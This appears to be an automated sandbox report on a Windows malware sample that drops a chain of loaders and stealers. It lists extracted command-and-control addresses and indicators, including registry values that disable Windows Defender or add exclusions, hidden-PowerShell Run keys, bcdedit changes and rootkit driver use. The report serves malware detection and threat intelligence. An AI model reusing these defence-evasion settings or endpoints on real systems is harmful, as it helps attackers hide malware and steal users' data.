Analysis
-
max time kernel
308s -
max time network
333s -
platform
windows7_x64 -
resource
win7-20231023-en -
resource tags
arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system -
submitted
25/10/2023, 04:51
Behavioral task
behavioral1
Sample
3sO43CV.exe
Resource
win7-20231023-en
General
-
Target
3sO43CV.exe
-
Size
30KB
-
MD5
bb350d2e0e5e39600b4931cfe357000a
-
SHA1
c96600fcb879676e9f2f565b3b5a48d9715aff3b
-
SHA256
b38974ff3894deba1a8051bfa42733f2099cd2d65460aabb804b4e6583fa4716
-
SHA512
6c84554565a8079827bf9d7ec6eb8169f67843079dfa3bdcb8df4d5f88b8de60f29974f96b27c13d0241576e0044919dcc56be969f20975eedef6b55a77a7c9e
-
SSDEEP
384:K9VD6tee+qUOTd2opQTLAdz1SvNmhpdvOjT7PbA6HBiTSnjxZMdP05ldpRMaYIBI:k6Qe+qUv8zcqdvOXA6XkPslJvGaVW
Malware Config
Extracted
smokeloader
2022
http://77.91.68.29/fks/
Extracted
redline
grome
77.91.124.86:19084
Extracted
amadey
3.89
http://77.91.124.1/theme/index.php
-
install_dir
fefffe8cea
-
install_file
explothe.exe
-
strings_key
36a96139c1118a354edf72b1080d4b2f
Extracted
redline
kinza
77.91.124.86:19084
Extracted
smokeloader
up3
Extracted
smokeloader
2020
http://host-file-host6.com/
http://host-host-file8.com/
Extracted
raccoon
6a6a005b9aa778f606280c5fa24ae595
http://195.123.218.98:80
http://31.192.23
-
user_agent
SunShineMoonLight
Signatures
-
DcRat 17 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
description ioc pid Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3sO43CV.exe 2228 schtasks.exe 2040 schtasks.exe 2320 schtasks.exe 928 schtasks.exe 1860 schtasks.exe 788 schtasks.exe 1604 schtasks.exe 1292 schtasks.exe 1196 schtasks.exe 2748 schtasks.exe 2076 schtasks.exe 568 schtasks.exe 1772 schtasks.exe 912 schtasks.exe 840 schtasks.exe 2856 schtasks.exe -
Detect ZGRat V1 1 IoCs
resource yara_rule behavioral1/memory/1032-682-0x0000000000A40000-0x0000000000E20000-memory.dmp family_zgrat_v1 -
Glupteba payload 8 IoCs
resource yara_rule behavioral1/memory/1656-563-0x0000000002B10000-0x00000000033FB000-memory.dmp family_glupteba behavioral1/memory/1656-564-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral1/memory/1656-606-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral1/memory/1656-655-0x0000000002B10000-0x00000000033FB000-memory.dmp family_glupteba behavioral1/memory/1656-672-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral1/memory/1656-674-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral1/memory/1656-697-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral1/memory/1656-1039-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 8866.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 8866.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 8866.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 8866.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 8866.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 8866.exe -
Raccoon Stealer payload 1 IoCs
resource yara_rule behavioral1/memory/768-1193-0x0000000000400000-0x000000000041B000-memory.dmp family_raccoon -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 10 IoCs
resource yara_rule behavioral1/files/0x0007000000016ba2-53.dat family_redline behavioral1/files/0x0007000000016ba2-57.dat family_redline behavioral1/memory/580-148-0x0000000000F50000-0x0000000000F8E000-memory.dmp family_redline behavioral1/files/0x0006000000016cfd-262.dat family_redline behavioral1/files/0x0006000000016cfd-267.dat family_redline behavioral1/files/0x0006000000016cfd-266.dat family_redline behavioral1/files/0x0006000000016cfd-265.dat family_redline behavioral1/memory/1528-269-0x0000000000EC0000-0x0000000000EFE000-memory.dmp family_redline behavioral1/memory/1992-527-0x0000000000400000-0x000000000047E000-memory.dmp family_redline behavioral1/memory/1992-526-0x00000000002A0000-0x00000000002FA000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
description pid Process procid_target PID 2940 created 1204 2940 latestX.exe 11 PID 2940 created 1204 2940 latestX.exe 11 PID 2940 created 1204 2940 latestX.exe 11 PID 2940 created 1204 2940 latestX.exe 11 PID 2940 created 1204 2940 latestX.exe 11 PID 1940 created 1204 1940 updater.exe 11 PID 1940 created 1204 1940 updater.exe 11 PID 1940 created 1204 1940 updater.exe 11 PID 1940 created 1204 1940 updater.exe 11 PID 1940 created 1204 1940 updater.exe 11 PID 1940 created 1204 1940 updater.exe 11 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\wUBDPVxDQVpvNZiy = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\nBRnpywzcTvqknVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths DllHost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\GpfcWYRxKqUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths schtasks.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR = "0" conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oVhJPNkDU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\wUBDPVxDQVpvNZiy = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KrPQunXfXpAVC = "0" conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oVhJPNkDU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\wUBDPVxDQVpvNZiy = "0" DllHost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DlbZONUGhjVU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\GpfcWYRxKqUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DlbZONUGhjVU2 = "0" conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\wUBDPVxDQVpvNZiy = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KrPQunXfXpAVC = "0" schtasks.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\nBRnpywzcTvqknVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Modifies boot configuration data using bcdedit 14 IoCs
pid Process 2628 bcdedit.exe 2816 bcdedit.exe 2256 bcdedit.exe 2636 bcdedit.exe 3040 bcdedit.exe 368 bcdedit.exe 848 bcdedit.exe 1804 bcdedit.exe 2140 bcdedit.exe 2480 bcdedit.exe 912 bcdedit.exe 2472 bcdedit.exe 1520 bcdedit.exe 3032 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 190 2260 rundll32.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts latestX.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe File created C:\Windows\system32\drivers\Winmon.sys csrss.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 1484 netsh.exe -
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Control Panel\International\Geo\Nation EixwDOh.exe -
Deletes itself 1 IoCs
pid Process 1204 Explorer.EXE -
Executes dropped EXE 45 IoCs
pid Process 2708 80D3.exe 2500 82F6.exe 2660 Rl0Uz9HJ.exe 2308 vk8qw0bZ.exe 580 8568.exe 964 TM0pC3TM.exe 1684 YD6bx5XP.exe 1980 8866.exe 1292 1Dk37rF7.exe 1524 8AC7.exe 2932 explothe.exe 1528 2Jf821dM.exe 556 12BC.exe 2780 155C.exe 1992 17EC.exe 1468 toolspub2.exe 1656 31839b57a4f11171d6abc8bbc4451ee4.exe 1620 toolspub2.exe 3036 setup.exe 1288 Install.exe 1484 kos2.exe 2940 latestX.exe 2436 Install.exe 2988 set16.exe 2600 is-TP019.tmp 2496 K.exe 1720 MyBurn.exe 1636 54CE.exe 1032 6CE1.exe 2712 explothe.exe 2096 MyBurn.exe 2272 31839b57a4f11171d6abc8bbc4451ee4.exe 2688 csrss.exe 1940 updater.exe 2960 patch.exe 2008 injector.exe 688 explothe.exe 1760 rVzNwXv.exe 700 dsefix.exe 2184 windefender.exe 2732 windefender.exe 1200 EixwDOh.exe 2968 explothe.exe 2696 f801950a962ddba14caaa44bf084b55c.exe 2076 explothe.exe -
Loads dropped DLL 64 IoCs
pid Process 2708 80D3.exe 2708 80D3.exe 2660 Rl0Uz9HJ.exe 2660 Rl0Uz9HJ.exe 2308 vk8qw0bZ.exe 2308 vk8qw0bZ.exe 964 TM0pC3TM.exe 964 TM0pC3TM.exe 1684 YD6bx5XP.exe 1684 YD6bx5XP.exe 1684 YD6bx5XP.exe 1292 1Dk37rF7.exe 1524 8AC7.exe 1684 YD6bx5XP.exe 1528 2Jf821dM.exe 556 12BC.exe 556 12BC.exe 556 12BC.exe 556 12BC.exe 1992 17EC.exe 1992 17EC.exe 556 12BC.exe 2148 WerFault.exe 2148 WerFault.exe 1468 toolspub2.exe 2148 WerFault.exe 3036 setup.exe 3036 setup.exe 3036 setup.exe 556 12BC.exe 3036 setup.exe 1288 Install.exe 1288 Install.exe 1288 Install.exe 556 12BC.exe 1288 Install.exe 2436 Install.exe 2436 Install.exe 2436 Install.exe 1484 kos2.exe 2988 set16.exe 2988 set16.exe 2988 set16.exe 2988 set16.exe 1484 kos2.exe 2600 is-TP019.tmp 2600 is-TP019.tmp 2600 is-TP019.tmp 2600 is-TP019.tmp 2600 is-TP019.tmp 1720 MyBurn.exe 1720 MyBurn.exe 1204 Explorer.EXE 2292 rundll32.exe 2292 rundll32.exe 2292 rundll32.exe 2292 rundll32.exe 2600 is-TP019.tmp 2096 MyBurn.exe 2096 MyBurn.exe 1032 6CE1.exe 2272 31839b57a4f11171d6abc8bbc4451ee4.exe 2272 31839b57a4f11171d6abc8bbc4451ee4.exe 1496 taskeng.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x0007000000012119-1771.dat upx -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 51.159.66.125 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 8866.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features 8866.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" TM0pC3TM.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" YD6bx5XP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\155C.exe'\"" 155C.exe Set value (str) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 80D3.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" Rl0Uz9HJ.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" vk8qw0bZ.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json EixwDOh.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json EixwDOh.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Manipulates WinMon driver. 1 IoCs
Roottkits write to WinMon to hide PIDs from being detected.
description ioc Process File opened for modification \??\WinMon csrss.exe -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 22 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol rVzNwXv.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat EixwDOh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_3177CE6CD1B3852A6EC841765B1A16FB EixwDOh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_8E9F8DBF10736410A01753CD3E271280 EixwDOh.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini rVzNwXv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_07142A81A102242D09FF624B465962F7 EixwDOh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA EixwDOh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA EixwDOh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_07142A81A102242D09FF624B465962F7 EixwDOh.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA EixwDOh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA EixwDOh.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol EixwDOh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_3177CE6CD1B3852A6EC841765B1A16FB EixwDOh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_8E9F8DBF10736410A01753CD3E271280 EixwDOh.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 1292 set thread context of 2012 1292 1Dk37rF7.exe 47 PID 1468 set thread context of 1620 1468 toolspub2.exe 69 PID 1032 set thread context of 768 1032 6CE1.exe 134 PID 1636 set thread context of 1656 1636 54CE.exe 154 PID 1940 set thread context of 2488 1940 updater.exe 212 PID 1940 set thread context of 2868 1940 updater.exe 214 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 31839b57a4f11171d6abc8bbc4451ee4.exe -
Drops file in Program Files directory 27 IoCs
description ioc Process File created C:\Program Files (x86)\KrPQunXfXpAVC\UPAWKJU.xml EixwDOh.exe File created C:\Program Files (x86)\GpfcWYRxKqUn\KEKMPam.dll EixwDOh.exe File created C:\Program Files (x86)\MyBurn\is-GACI7.tmp is-TP019.tmp File opened for modification C:\Program Files (x86)\MyBurn\unins000.dat is-TP019.tmp File created C:\Program Files (x86)\DlbZONUGhjVU2\jjltJxfeoRNEg.dll EixwDOh.exe File created C:\Program Files (x86)\MyBurn\is-N4EIN.tmp is-TP019.tmp File opened for modification C:\Program Files (x86)\MyBurn\MyBurn.exe is-TP019.tmp File created C:\Program Files (x86)\MyBurn\Sounds\is-VTKBU.tmp is-TP019.tmp File created C:\Program Files\Google\Chrome\updater.exe latestX.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja EixwDOh.exe File created C:\Program Files (x86)\MyBurn\is-1RCOJ.tmp is-TP019.tmp File created C:\Program Files (x86)\MyBurn\is-SFESJ.tmp is-TP019.tmp File created C:\Program Files (x86)\MyBurn\is-SH2J3.tmp is-TP019.tmp File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi EixwDOh.exe File created C:\Program Files (x86)\oVhJPNkDU\ipYlZgZ.xml EixwDOh.exe File created C:\Program Files (x86)\MyBurn\is-NBI45.tmp is-TP019.tmp File created C:\Program Files (x86)\oVhJPNkDU\jtxeRE.dll EixwDOh.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi EixwDOh.exe File created C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\yPvhnHM.dll EixwDOh.exe File created C:\Program Files (x86)\MyBurn\Sounds\is-5DLAO.tmp is-TP019.tmp File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak EixwDOh.exe File created C:\Program Files (x86)\DlbZONUGhjVU2\zTVzRhL.xml EixwDOh.exe File created C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\PksooSV.xml EixwDOh.exe File created C:\Program Files (x86)\KrPQunXfXpAVC\ciyUXWx.dll EixwDOh.exe File created C:\Program Files (x86)\MyBurn\unins000.dat is-TP019.tmp File created C:\Program Files (x86)\MyBurn\is-LGLJG.tmp is-TP019.tmp -
Drops file in Windows directory 10 IoCs
description ioc Process File opened for modification C:\Windows\rss 31839b57a4f11171d6abc8bbc4451ee4.exe File created C:\Windows\rss\csrss.exe 31839b57a4f11171d6abc8bbc4451ee4.exe File created C:\Windows\Tasks\bwpFiyeZPJPVdaMxTt.job schtasks.exe File opened for modification C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune 17EC.exe File created C:\Windows\Logs\CBS\CbsPersist_20231025045518.cab makecab.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\Tasks\GyWbuVQzPmDmgkCMH.job schtasks.exe File created C:\Windows\Tasks\ztlTbPYifermRZH.job schtasks.exe File created C:\Windows\Tasks\HKFMMLmWpeGdwIqGl.job schtasks.exe -
Launches sc.exe 11 IoCs
Sc.exe is a Windows utlilty to control services on the system.
